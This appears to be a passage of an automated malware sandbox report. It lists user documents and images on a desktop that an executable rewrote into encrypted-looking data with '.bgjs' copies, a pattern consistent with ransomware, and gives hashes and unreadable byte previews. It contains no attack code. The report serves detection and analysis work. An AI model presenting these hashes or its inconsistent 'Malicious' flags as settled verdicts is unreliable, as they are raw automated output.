                                                                                                                                      Preview:NWCXB.yz.".0.G'?Nb.m.....H..2i........ac.t...1c....9m-....F/qW..q;.q..+.g[....x...n..Lme...e..:.-HK.i.+O.&.C....._s..]..~....k..6...~.........4E;.`CQ:S.Z....s.{...E..PfWn.G...C....'$....3.+L.....>.8...U.hht.l.4X..;x....q..T|..S.n..&....[.;...G..G..:.....=..?pSL..n5..MGI.,_o.g8*.Y>.....;.........../We@Q..Y {..z.g.. ....`^T+d..Z5=XM..m...r9bC...|.Y<G5..>.....jH=...bu;Mj.......f.g.tI..p..b=$+...~...n...0...m..........e...R.... zd.8.}..H..F..,.o...T.w..1f,a.o7t..8.E..Hf.3;...P>;.f.|.L.2.-.t*.f....j{.v..-.%01.qWy.H.<h.|.N...0..O...M. .yM]P..r.]....v....!.F..u..A..-Y...Y...na{..ZbF[o...oa......t`.6..W...3z........ . ...W..w.KuQ...>......".ql.R.T6.....M....A..Z...*...).No...A.]n.m.8&..r`.t..>.......8..QI...v).e....q..b}uG.?f....7o.}.X..n!}..........e.{.,|Si:...T`...y....<Y.9.Vo.W.Q...\N.n...la.-.x.-yED.3.7.>v.>S.!.....#..].n^g0.3.."f..v!'........}P.c..e..s.....>.b...M.jX.H..Pw.K......*B3(.C1I..>6QM.Q.p>?.....N...3.o.7,...]..3..m..w.|Y.....S..

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA.docx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.857118472521943
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:vAtsN5+dBCz3J4SGcQnivd1pKE1VSCmRFnpors8+QarFwuXTFqanYgWP+HibD:v0PdBO2SGcQiFKGYlbnpors8+dr/DIa6
                                                                                                                                      MD5:C81741710CFC9D692ADC88321F1365E0
                                                                                                                                      SHA1:77D3A0CB423DD94806643F58810722B263926C46
                                                                                                                                      SHA-256:FEB011C97A358F274F467307628F0C2A1BB02F3D6A2E1233AC3B32BF9F84E55F
                                                                                                                                      SHA-512:63F5658991955B7CD632AD5D5599A10D7A7EB200E87CCAE20BEB2C941D5323D9D9B74957C6EFE9B3F98DA005652AA506A19020BE3B800C0DD604BF5DF721EA23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP.1..2....=5u..2..X$..F...o.tai.Sm.`..r...g.z.4.f..._.2..V.N...C....P..K6.x.b.=.$le.....=..xX..K2.......b...w.8.B...Q.....p*....\s...{.r.'.lm......;..O.|..j.R..HU...|Z[....`Y|m.A..d%/.Z8x|...*l...._.d.0..7+..#.... w..ea.P....&......k..%C..g..%..g.9.$2.QJ.....Q.Q.. $...r2.(g.N....=V..&rk....J...........$......"K..RB.mm..L...2..@p.CY...;...%!.D.%_.@...F .Sz.....d.?.Z...yx..E.a.io|.lv{.......'.d.nMVN~.......@!....}y.R...=m..%..S.w..d...;...d...e.er!....'..._5.{|n..y..Cv.Ud:.kf....p.e.... .^B..z..^..........._y....]t.....@.u...C.....)yKX@..7n.JD.o .n..<H...?......C...2#X.....s...C......F.cnep.....L/DS....;+c.r.}...^..$I[..te.0(-...j0..K...S.n|.k.3/'....l .DhLD....K.....pM.C..T.K..!.0..~.>Y.v....wi.h..'J.(*.........FG).[.$..@/quZ.I(....LF,..\...b..)]C.*N./.x.@.=Q...f....6.6:.%....A....e.d...I.Y.....q.....q.*0.MSh...^...P.+...._.P.V..I)......X.Z....{....f`J..Cs3v|..:/.,..y..z.[$g.&.n...{...O...`'......N.......2.;.....A....[..Cxy.Up.).. .....?...a...

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA.docx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.857118472521943
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:vAtsN5+dBCz3J4SGcQnivd1pKE1VSCmRFnpors8+QarFwuXTFqanYgWP+HibD:v0PdBO2SGcQiFKGYlbnpors8+dr/DIa6
                                                                                                                                      MD5:C81741710CFC9D692ADC88321F1365E0
                                                                                                                                      SHA1:77D3A0CB423DD94806643F58810722B263926C46
                                                                                                                                      SHA-256:FEB011C97A358F274F467307628F0C2A1BB02F3D6A2E1233AC3B32BF9F84E55F
                                                                                                                                      SHA-512:63F5658991955B7CD632AD5D5599A10D7A7EB200E87CCAE20BEB2C941D5323D9D9B74957C6EFE9B3F98DA005652AA506A19020BE3B800C0DD604BF5DF721EA23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMP.1..2....=5u..2..X$..F...o.tai.Sm.`..r...g.z.4.f..._.2..V.N...C....P..K6.x.b.=.$le.....=..xX..K2.......b...w.8.B...Q.....p*....\s...{.r.'.lm......;..O.|..j.R..HU...|Z[....`Y|m.A..d%/.Z8x|...*l...._.d.0..7+..#.... w..ea.P....&......k..%C..g..%..g.9.$2.QJ.....Q.Q.. $...r2.(g.N....=V..&rk....J...........$......"K..RB.mm..L...2..@p.CY...;...%!.D.%_.@...F .Sz.....d.?.Z...yx..E.a.io|.lv{.......'.d.nMVN~.......@!....}y.R...=m..%..S.w..d...;...d...e.er!....'..._5.{|n..y..Cv.Ud:.kf....p.e.... .^B..z..^..........._y....]t.....@.u...C.....)yKX@..7n.JD.o .n..<H...?......C...2#X.....s...C......F.cnep.....L/DS....;+c.r.}...^..$I[..te.0(-...j0..K...S.n|.k.3/'....l .DhLD....K.....pM.C..T.K..!.0..~.>Y.v....wi.h..'J.(*.........FG).[.$..@/quZ.I(....LF,..\...b..)]C.*N./.x.@.=Q...f....6.6:.%....A....e.d...I.Y.....q.....q.*0.MSh...^...P.+...._.P.V..I)......X.Z....{....f`J..Cs3v|..:/.,..y..z.[$g.&.n...{...O...`'......N.......2.;.....A....[..Cxy.Up.).. .....?...a...

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.854971189975351
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gt7cWNVlGsAojoD4VPSb14BFSWSbU5EUtUi5RhfI09sHRlN8OiIoCABmCiSOMSU+:2gWDsfbC5EoU+Rv9sHze1INADiSnzXSD
                                                                                                                                      MD5:60BEE73F571402CF11F76314BB251DB3
                                                                                                                                      SHA1:0235AC1E4E2CE0BDF976C9CAADFDBBFB3B932E7A
                                                                                                                                      SHA-256:B69B57426DA932C09932D2A8E94CAD371BC8A856609F492E4D704A5D52FED409
                                                                                                                                      SHA-512:1225CD6368F413DAD51E5716153078E5A3D7236F7A7B1CAECDF59824EE7F719EA898FEEA4AA319B8C4DCA899C17260E1A4BC91B589ADD69A37F45C74ED126805
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPO......y.9..gj..k...Z..X...P.rx..8Hv[W...Wd.B.....:te'.u...*...R...20...38..i.|r.z.)&..H26.Pj\..[.$..=..7B........g....@.W!....j......(.l....Hag..e?..r....p....&}(..0;...q._....ME..Il..../wh.&.v..-)...Z....u+.......8..e..V t.2....T.~.......6.U.P. ...y............._...F.i..........L..G.._#a0...@.......u+.Z.O<..V..F.c........%/........R' .. .&;..|...4yOv..].x..@.>.\....!AN..d.Tc..~_...RpDr.?.b........(..@.....<....Q..@...H.&......y/....~3......z..]..Dh+..R.#T=.<y.B..WMT.....|..x.....c$.....>....]..o...%=....R..z..,q..;^......-...t..T.Z,.....c.0/.o@.q.+`...z..(.}...%Zy..<b........<.ea.........>SE...WsB...:KW..).l.;z......!;d.t.8.....Qa.!.O#...[......IX..&..I.%...@....f(.+...m..GR..d..^......t..Vl..Q^.SF....*..ys).rc...O....x....H.....nt....Y.\#........r..rq..HHiR....O..N.[.(..&.J...%.@w.S...[..:l..2>..%.......G[A}6}Pv.eC..........6d%....s.yvM.{..I.....FT.............*iX Gv...R....@q..4..w*..L.J..T./...y`.PwMLQ...e{.,..OHAm....

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.854971189975351
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:gt7cWNVlGsAojoD4VPSb14BFSWSbU5EUtUi5RhfI09sHRlN8OiIoCABmCiSOMSU+:2gWDsfbC5EoU+Rv9sHze1INADiSnzXSD
                                                                                                                                      MD5:60BEE73F571402CF11F76314BB251DB3
                                                                                                                                      SHA1:0235AC1E4E2CE0BDF976C9CAADFDBBFB3B932E7A
                                                                                                                                      SHA-256:B69B57426DA932C09932D2A8E94CAD371BC8A856609F492E4D704A5D52FED409
                                                                                                                                      SHA-512:1225CD6368F413DAD51E5716153078E5A3D7236F7A7B1CAECDF59824EE7F719EA898FEEA4AA319B8C4DCA899C17260E1A4BC91B589ADD69A37F45C74ED126805
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:NYMMPO......y.9..gj..k...Z..X...P.rx..8Hv[W...Wd.B.....:te'.u...*...R...20...38..i.|r.z.)&..H26.Pj\..[.$..=..7B........g....@.W!....j......(.l....Hag..e?..r....p....&}(..0;...q._....ME..Il..../wh.&.v..-)...Z....u+.......8..e..V t.2....T.~.......6.U.P. ...y............._...F.i..........L..G.._#a0...@.......u+.Z.O<..V..F.c........%/........R' .. .&;..|...4yOv..].x..@.>.\....!AN..d.Tc..~_...RpDr.?.b........(..@.....<....Q..@...H.&......y/....~3......z..]..Dh+..R.#T=.<y.B..WMT.....|..x.....c$.....>....]..o...%=....R..z..,q..;^......-...t..T.Z,.....c.0/.o@.q.+`...z..(.}...%Zy..<b........<.ea.........>SE...WsB...:KW..).l.;z......!;d.t.8.....Qa.!.O#...[......IX..&..I.%...@....f(.+...m..GR..d..^......t..Vl..Q^.SF....*..ys).rc...O....x....H.....nt....Y.\#........r..rq..HHiR....O..N.[.(..&.J...%.@w.S...[..:l..2>..%.......G[A}6}Pv.eC..........6d%....s.yvM.{..I.....FT.............*iX Gv...R....@q..4..w*..L.J..T./...y`.PwMLQ...e{.,..OHAm....

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\GLTYDMDUST.pdf

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.854909676293136
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/tCOLfygORazRIsZJEG+DU1wWL1R4/ekjNpJb22u1C16lJ9tb/kc0H96mbD:DLqFsRI6J9+DfAC32vFl3tb/h0H9zD
                                                                                                                                      MD5:859082D32635F34D39CE21A1C835EF2E
                                                                                                                                      SHA1:280A7D1C48B8934EEBFAC6654E9080C81C906359
                                                                                                                                      SHA-256:F1D1B5D185B11241DB0B342321A97E704DEE86510781158FEEBC4562418A57FB
                                                                                                                                      SHA-512:1E0EBEBD0609EF902496867C2771701C4FF9416BC3E86345FD7F8421180A610BAA34C6211FD1F250A300840867B0925820C2E8C71099F7D9A0DE14B6CC568CB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD'...P.CYu..MI....U.:..O.#...S....X.lh....5.......;..X..?.}..t..B..[..S.5.`..p.3.Vx.D.i.j*...|.1....F=..~-DnK.W.....?.b......PN.$..^...x.x.#k.(<...E.....oPjD...~.9.P..8iw...;Z..T..9v..:(...3.M.B"aZMf...@tJ...'v.Ss...s...@.)...A.i]....<y....j.|..s........y.p}O.lz.U..yQ.E.$.;67.}V.......[T.j.."1.v.#.V.u.N....A..g...Q...l../r...zCvJ..*)gul.n.y..9......k.....{.nRH6... ....4.M...8......6.NA......g.a.......zj...m.F.......Z..._..SB&4.:......<...tI.@...GM....0a.AUh....#..R...jI..i~...^.'.d.r'.(]...XI4o..d.R..2.6..UUFK..j.F..*e. }+...R.H..v.ZnN.C...j.r.W.AlI....r.f.\.../..v...ma..q~<<.......-..M..m.f...}.....~......~...A....t..EN5ms<..KD<&.....S.+=..~...D.k.....9.../=M.......0.8.$.<...._.f..R..X.a..0V.i.:.+..E0.0..c.....&.....O.+.x}....i...}!h.f'no.[....m....eb5 /4.MN..v%...|.......97.."p.r..+.Y.6.JR.S..........c...^\...j)..,>... ...DP.HR....s,..zo.W.*..4?@.a.i4SMk....)..Z..`|....3...ts....i.nx!.b.....N....\z+.`.i.+M...w3..z.h.g.f7.^a..<

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\GLTYDMDUST.pdf.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.854909676293136
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:/tCOLfygORazRIsZJEG+DU1wWL1R4/ekjNpJb22u1C16lJ9tb/kc0H96mbD:DLqFsRI6J9+DfAC32vFl3tb/h0H9zD
                                                                                                                                      MD5:859082D32635F34D39CE21A1C835EF2E
                                                                                                                                      SHA1:280A7D1C48B8934EEBFAC6654E9080C81C906359
                                                                                                                                      SHA-256:F1D1B5D185B11241DB0B342321A97E704DEE86510781158FEEBC4562418A57FB
                                                                                                                                      SHA-512:1E0EBEBD0609EF902496867C2771701C4FF9416BC3E86345FD7F8421180A610BAA34C6211FD1F250A300840867B0925820C2E8C71099F7D9A0DE14B6CC568CB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:GLTYD'...P.CYu..MI....U.:..O.#...S....X.lh....5.......;..X..?.}..t..B..[..S.5.`..p.3.Vx.D.i.j*...|.1....F=..~-DnK.W.....?.b......PN.$..^...x.x.#k.(<...E.....oPjD...~.9.P..8iw...;Z..T..9v..:(...3.M.B"aZMf...@tJ...'v.Ss...s...@.)...A.i]....<y....j.|..s........y.p}O.lz.U..yQ.E.$.;67.}V.......[T.j.."1.v.#.V.u.N....A..g...Q...l../r...zCvJ..*)gul.n.y..9......k.....{.nRH6... ....4.M...8......6.NA......g.a.......zj...m.F.......Z..._..SB&4.:......<...tI.@...GM....0a.AUh....#..R...jI..i~...^.'.d.r'.(]...XI4o..d.R..2.6..UUFK..j.F..*e. }+...R.H..v.ZnN.C...j.r.W.AlI....r.f.\.../..v...ma..q~<<.......-..M..m.f...}.....~......~...A....t..EN5ms<..KD<&.....S.+=..~...D.k.....9.../=M.......0.8.$.<...._.f..R..X.a..0V.i.:.+..E0.0..c.....&.....O.+.x}....i...}!h.f'no.[....m....eb5 /4.MN..v%...|.......97.."p.r..+.Y.6.JR.S..........c...^\...j)..,>... ...DP.HR....s,..zo.W.*..4?@.a.i4SMk....)..Z..`|....3...ts....i.nx!.b.....N....\z+.`.i.+M...w3..z.h.g.f7.^a..<

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\HMPPSXQPQV.png

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855369067786387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fmPmDBnXbJ+r6e/Dftr0ML2c5vXdWcwIzE0Lb6WoWBahXHmP6bD:fmPmDxJ66e/5gML2cy0f/ooahw4D
                                                                                                                                      MD5:18D84D1A5B823323163B4AE4D9C764B9
                                                                                                                                      SHA1:4C5D1F5D0B9FACF750DCF13B8E02FC17C60404B2
                                                                                                                                      SHA-256:048369929DEBC7DC8E6961EDA859071516EAF83174A93BF61CE4B0A58E61332B
                                                                                                                                      SHA-512:C8F057607B55E929BC5F298CF1A37DB431D6DBAC24EE63F73D421C46586B1DC5DE0989E7891D0AFC5AB2FDA7D92F589404557B78F101D17EA834D7EF310E0D8C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS...E..+.....Jz.H.....C.A...(..(P....X.b.[X,d..^.!..%..@.XL.a......B.TY.....J].`....?U<....i"..j.|.A....p.f$..c2.|..).6......XX.."k..Y..J....K.t.f..u...:.ad..x..Y@0.]Z...!.q..S~...K)*....X....~..e..y.SN+..=.a1j .z....,].gi.1u....".j......m...'.r&..J./..2Z;..5.......z4Bp......{..&.....|fb8.&q...Kd.'pv}.*D..F..\v....~.....H...)/.P.jb8M.-bM.....E&..#^2.uH8.7....'.........8,...>..F..k.....K....+ofA..NP.h0....>rR..c.`\rxd........-..1.....qx.W.h.;Y...3.2....-."u./Q..-.UoI!I.Nf&..-.V.l....w.X.*..v....k..i.N.T...E$.15..c....U.}.r~.`.s*..p_2....%.+..M...f.t....ik...}..........LH7.++.....lk.0-w......+R.q...cB7+o^...X.5..3v.m.(.........+.K..&2Z.......^..K...8u....pdsI....H..'.p.V..#l:?.k....%.g.....16..)..R.7!....Q...+#)...7W.......D+..n4.0...y.H..]2...&t..!. ]<..A.}......D......."t..E..j.u..x.%.5.]..O........ i.;4.=....>...b.P..ut)..2.S]........&F(..TTy}?.)Te..T.c.I.R.x.C.6N..O/B?.R'.xa.a......P.G.\J.|V^.~.^tV.G..:.N.:..FP...90..g...f....`'

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\HMPPSXQPQV.png.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.855369067786387
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:fmPmDBnXbJ+r6e/Dftr0ML2c5vXdWcwIzE0Lb6WoWBahXHmP6bD:fmPmDxJ66e/5gML2cy0f/ooahw4D
                                                                                                                                      MD5:18D84D1A5B823323163B4AE4D9C764B9
                                                                                                                                      SHA1:4C5D1F5D0B9FACF750DCF13B8E02FC17C60404B2
                                                                                                                                      SHA-256:048369929DEBC7DC8E6961EDA859071516EAF83174A93BF61CE4B0A58E61332B
                                                                                                                                      SHA-512:C8F057607B55E929BC5F298CF1A37DB431D6DBAC24EE63F73D421C46586B1DC5DE0989E7891D0AFC5AB2FDA7D92F589404557B78F101D17EA834D7EF310E0D8C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:HMPPS...E..+.....Jz.H.....C.A...(..(P....X.b.[X,d..^.!..%..@.XL.a......B.TY.....J].`....?U<....i"..j.|.A....p.f$..c2.|..).6......XX.."k..Y..J....K.t.f..u...:.ad..x..Y@0.]Z...!.q..S~...K)*....X....~..e..y.SN+..=.a1j .z....,].gi.1u....".j......m...'.r&..J./..2Z;..5.......z4Bp......{..&.....|fb8.&q...Kd.'pv}.*D..F..\v....~.....H...)/.P.jb8M.-bM.....E&..#^2.uH8.7....'.........8,...>..F..k.....K....+ofA..NP.h0....>rR..c.`\rxd........-..1.....qx.W.h.;Y...3.2....-."u./Q..-.UoI!I.Nf&..-.V.l....w.X.*..v....k..i.N.T...E$.15..c....U.}.r~.`.s*..p_2....%.+..M...f.t....ik...}..........LH7.++.....lk.0-w......+R.q...cB7+o^...X.5..3v.m.(.........+.K..&2Z.......^..K...8u....pdsI....H..'.p.V..#l:?.k....%.g.....16..)..R.7!....Q...+#)...7W.......D+..n4.0...y.H..]2...&t..!. ]<..A.}......D......."t..E..j.u..x.%.5.]..O........ i.;4.=....>...b.P..ut)..2.S]........&F(..TTy}?.)Te..T.c.I.R.x.C.6N..O/B?.R'.xa.a......P.G.\J.|V^.~.^tV.G..:.N.:..FP...90..g...f....`'

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\LFOPODGVOH.jpg

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.859703553656198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GPKhizVv05SJK2jl+8JfqUy8u5Dimdt3+OoOynP1+ex5Egp4XQynMbD:GPKQza5SQ0l+o5ybOm/3+fN+exigp4gR
                                                                                                                                      MD5:8E9F026D4CE872D37DCAD3104662D432
                                                                                                                                      SHA1:CB0CC19F88CAA8584E83D6DAA9E2256814DD598B
                                                                                                                                      SHA-256:1F9BFEB113A471C35FC49EE6816C2213DFF19F2EAFC5956D46351B0074AF2792
                                                                                                                                      SHA-512:8DAE292B700F5D4498B09632D16D6A8A4AF8F3C634F290F4D10430A53A06C45324708FF77E042A1D14922E90019F23241339D5E055093A6F3E649370591E1A1E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO,.]...!.Ke.(.`...lg..(..AG......:..>..j......|.>aMz..C1....#\."..|.j...H.....p..m.....^V(.H..H.D..T..J.......wd...I....@D..Q....RD.~..v.^R5.y...<.>]Pg(....tyES&..#:.F.....r.1\.=[.:=.GF..?y.E....m.9.......7....-r.zA.zZ..D^~....".... b..<..&....R.>_xps..JL..$m.V......ry..O.P.k{.......QS..6.zt.X..^...h.+.<EX..{&:...X...v..a.@'..0.EM#R....'...DE...C.[...}i.[.WS|...a..4..."f.dC.8,.M......=q.,.......@...._V-...p....%.u.M..1.......O..!}..6..-).Y..C..+gq257<"s.......+Z...3....j..KG..Z....N../..D...Z....jnYG.HD..3>0....+..`.?.W.j..77e.f&?.W..y.+.$.[Q.U0.K....+..%....j..a... .\/..<.N..+T..Nn...d*......e'^.@..f.. ....M.q?....G.z".O../.........k.%...K}.<...B....>......g.....'..H\..zU....3.`.).L.@.i.3..W.@&....l.0........BU.%.....^.X...2.f.DZ....B.'..oC.N.....(.s2..#....}..[......Y.G....._..csV.....Z..DR.....E...{.e.F.....d@..}.*o..G..;0.n........Y..$#.(J..yOw..0`Y...Or.<.....].i......en.$....?{4..+.3..{..kQs....y]j...?..@l....z...|.Li....=/~..

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\LFOPODGVOH.jpg.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.859703553656198
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GPKhizVv05SJK2jl+8JfqUy8u5Dimdt3+OoOynP1+ex5Egp4XQynMbD:GPKQza5SQ0l+o5ybOm/3+fN+exigp4gR
                                                                                                                                      MD5:8E9F026D4CE872D37DCAD3104662D432
                                                                                                                                      SHA1:CB0CC19F88CAA8584E83D6DAA9E2256814DD598B
                                                                                                                                      SHA-256:1F9BFEB113A471C35FC49EE6816C2213DFF19F2EAFC5956D46351B0074AF2792
                                                                                                                                      SHA-512:8DAE292B700F5D4498B09632D16D6A8A4AF8F3C634F290F4D10430A53A06C45324708FF77E042A1D14922E90019F23241339D5E055093A6F3E649370591E1A1E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:LFOPO,.]...!.Ke.(.`...lg..(..AG......:..>..j......|.>aMz..C1....#\."..|.j...H.....p..m.....^V(.H..H.D..T..J.......wd...I....@D..Q....RD.~..v.^R5.y...<.>]Pg(....tyES&..#:.F.....r.1\.=[.:=.GF..?y.E....m.9.......7....-r.zA.zZ..D^~....".... b..<..&....R.>_xps..JL..$m.V......ry..O.P.k{.......QS..6.zt.X..^...h.+.<EX..{&:...X...v..a.@'..0.EM#R....'...DE...C.[...}i.[.WS|...a..4..."f.dC.8,.M......=q.,.......@...._V-...p....%.u.M..1.......O..!}..6..-).Y..C..+gq257<"s.......+Z...3....j..KG..Z....N../..D...Z....jnYG.HD..3>0....+..`.?.W.j..77e.f&?.W..y.+.$.[Q.U0.K....+..%....j..a... .\/..<.N..+T..Nn...d*......e'^.@..f.. ....M.q?....G.z".O../.........k.%...K}.<...B....>......g.....'..H\..zU....3.`.).L.@.i.3..W.@&....l.0........BU.%.....^.X...2.f.DZ....B.'..oC.N.....(.s2..#....}..[......Y.G....._..csV.....Z..DR.....E...{.e.F.....d@..}.*o..G..;0.n........Y..$#.(J..yOw..0`Y...Or.<.....].i......en.$....?{4..+.3..{..kQs....y]j...?..@l....z...|.Li....=/~..

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\NWCXBPIUYI.xlsx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84461589857839
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lEMmOK+4FuDD8Jxv39KLvVCYKFSUUgvBVgE8k6IdnMpbLt5wZbD:lEnOXuu8DILEFRKUdMRJqZD
                                                                                                                                      MD5:66EBA3D77AF6BE148BC766F71504DC35
                                                                                                                                      SHA1:4CE73884E5C2C05436E480E740825DAA87B2B3B7
                                                                                                                                      SHA-256:1619508CE15A2160AFF20C0B19D1A8C53EB1598D27407B586B0169144BAF81EA
                                                                                                                                      SHA-512:62F1F1ADE52CB031D76B1E4EC0816A35A972C60279A97306BF6DC2DEDBC1DB581CB87D9019DEACD8A99DBAE97C2A0FC8003D1FE746A3E8AE960A413ACBC56C9F
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:NWCXB.+..dW..Y...:~........\I..7....n|wr|+..t...._Hv....D.......^q..}B6*(.&_:......c......4(......n....q.....V<..i.>6R..2.s.X...[/G....c...so....0.W.....U...s.9./-.L.sN.iV....Q..R......`y".R...(.8..."a.4..R........JA.......S.W].C.^.T.@.,..&^.@...#k./mn....Ck....$.j.....%.0.3...d..Zcy...h....^L../...!p.".m..3........h..g9....UH...L...r.b......9..L.*....m.."..]......AD.......5..Lzt...<I.rT..}Q>.Kv..Po. ..B.8+..N....|.Q}}.Wx......jL..B......g.IXK..~.....6.],..s.^.fh.+..|....qK..y..Z^...,...sxg]..N..Q./.+..0.1......B )....5N$zt..*Y...,.~..c9l.n.O..i.3P.u.2T_.8f...X....h....L..[..MN(.....>#..G..g9./..ds..CF.......d7.........r.. ....X.YI&i....!0.Y...n.....4af.n.B...G... 6..JK...y6HIE.J}.].)..E-......O...:.&.t{.Y(...Kn.l..v..I..0%W..P.W/.;.Zb~.{..J...k.':.7wi.... ....>ZH.[..m/...O.q...5...v...6.x.<3.....9..6.`..g$......E..Cv..Yz....i67OG..7.E.<\r..?sOB&..?)i......w~5yvh.s.6..ig.p!_.xK3.Pr.k..~=..SP..y.4]):.`<...Uf{.78.\.)H...2...O...{N......r.

                                                                                                                                      C:\Users\user\Desktop\NYMMPCEIMA\NWCXBPIUYI.xlsx.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1360
                                                                                                                                      Entropy (8bit):7.84461589857839
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:lEMmOK+4FuDD8Jxv39KLvVCYKFSUUgvBVgE8k6IdnMpbLt5wZbD:lEnOXuu8DILEFRKUdMRJqZD
                                                                                                                                      MD5:66EBA3D77AF6BE148BC766F71504DC35
                                                                                                                                      SHA1:4CE73884E5C2C05436E480E740825DAA87B2B3B7
                                                                                                                                      SHA-256:1619508CE15A2160AFF20C0B19D1A8C53EB1598D27407B586B0169144BAF81EA
                                                                                                                                      SHA-512:62F1F1ADE52CB031D76B1E4EC0816A35A972C60279A97306BF6DC2DEDBC1DB581CB87D9019DEACD8A99DBAE97C2A0FC8003D1FE746A3E8AE960A413ACBC56C9F
                                                                                                                                      Malicious:false
